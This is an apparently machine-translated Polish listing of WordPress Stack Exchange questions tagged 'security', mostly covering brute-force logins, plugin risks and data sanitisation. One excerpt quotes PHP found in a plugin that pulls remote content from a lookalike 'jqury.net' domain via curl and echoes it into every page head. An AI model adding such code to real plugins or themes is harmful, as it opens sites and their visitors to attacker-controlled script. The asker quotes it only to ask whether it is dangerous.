Pytania otagowane jako security

Wzmocnienie motywów, wtyczek i instalacji rdzenia, aby zapobiec włamaniom.

3
Wzrost nieudanych prób logowania, ataki siłowe? [Zamknięte]
Zamknięte. To pytanie jest nie na temat . Obecnie nie przyjmuje odpowiedzi. Chcesz poprawić to pytanie? Zaktualizuj pytanie, aby było tematyczne na WordPress Development Stack Exchange. Zamknięte 4 lata temu . Zainstalowałem wtyczkę Simple Login Lockdown i od kilku dni baza danych rejestruje ponad 200 rekordów dziennie. Myślę, że nie …
20 login  security 
6
Czy wtyczki Wordpress są niezbędne?
Jestem nowy w WordPress. Niedawno przeczytałem artykuł o tym, jak hakerzy mogą wykorzystać luki we wtyczkach. Różne źródła, takie jak Google Pagespeed, również odradzają mi korzystanie z wtyczek lub przynajmniej ograniczają je do minimum. Osobiście staram się również unikać wtyczek, ponieważ mam większą kontrolę nad tym, co dzieje się na …
19 plugins  security 
2
Znalazłem to we wtyczce. Co to robi? czy to jest niebezpieczne?
Znalazłem to we wtyczce. Co to robi? czy to jest niebezpieczne? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }
2
W jakich kontekstach wtyczki są odpowiedzialne za sprawdzanie poprawności / dezynfekcję danych?
Chcę się upewnić, że wszystkie dane w moich wtyczkach / motywach są bezpiecznie obsługiwane przed wejściem do bazy danych i przed wysłaniem do przeglądarki. Mój problem polega na tym, że istnieją sytuacje, w których interfejs API zajmuje się czyszczeniem dla Ciebie - na przykład podczas zapisywania pól meta - i …
3
Jakie są typowe wady bezpieczeństwa, których muszę szukać? [Zamknięte]
W obecnej formie to pytanie nie pasuje do naszego formatu pytań i odpowiedzi. Oczekujemy, że odpowiedzi poparte będą faktami, referencjami lub wiedzą fachową, ale to pytanie prawdopodobnie będzie wymagało debaty, argumentów, ankiet lub rozszerzonej dyskusji. Jeśli uważasz, że to pytanie można poprawić i ewentualnie ponownie otworzyć, odwiedź centrum pomocy w …
4
Jak działa admin-ajax.php?
Mamy problemy z zewnętrznym programistą. Chcemy ograniczyć dostęp do wp-adminstrony tylko do dostępu wewnętrznego (przez VPN ). Po prostu nie będzie atakowany przez zewnętrznych użytkowników. Możemy wyliczyć administratorów z witryny i nie chcemy, aby zostali wyłudzeni. Nasz programista twierdzi, że nie możemy tego zrobić, ponieważ strona musi mieć zewnętrzną stronę …
14 admin  ajax  security 
3
Zapobiegaj dostępowi lub automatycznemu usuwaniu pliku readme.html, license.txt, wp-config-sample.php
Krótkie pytanie, które może trochę pomóc w bezpieczeństwie. Zauważyłem, że plik readme.html ma wymieniony numer wersji. Ponownie pojawia się po każdej aktualizacji, podobnie jak licence.txt i wp-config-sample.php. Czy istnieje prosty sposób, aby WordPress automatycznie usuwał te pliki po aktualizacji? Już blokuję wyświetlanie numeru wersji w metatagach, kanałach RSS, atomie itp. …
1
Jak bezpieczny / odkażony jest wp_insert_posts ()?
Patrząc na kodeks dla wp_insert_post () , stwierdza on, że ta funkcja „... dezynfekuje zmienne, wykonuje pewne kontrole, uzupełnia brakujące zmienne, takie jak data / czas itp.” (EDYCJA: Zaktualizowałem wpis Kodeksu, aby zawierał bardziej solidny przykład w tym bezpieczeństwo, a także meta post i przypisanie kategorii) Zastanawiam się tylko, czy …
4
Dlaczego powinienem używać esc_url?
To utrudnia moje kodowanie. Kodeks Wordpress uzasadnia użycie esc_url mówiąc niejasno o bezpieczeństwie. Ale czy to naprawdę jest warte kłopotów? Na przykład, jaka jest ważna, praktyczna korzyść z bezpieczeństwa przy użyciu <?php echo esc_url( home_url( '/' ) ); ?> zamiast <?php echo home_url() ?> PS: Nie mówię o tworzeniu motywów, …
12 security 
Korzystając z naszej strony potwierdzasz, że przeczytałeś(-aś) i rozumiesz nasze zasady używania plików cookie i zasady ochrony prywatności.
Licensed under cc by-sa 3.0 with attribution required.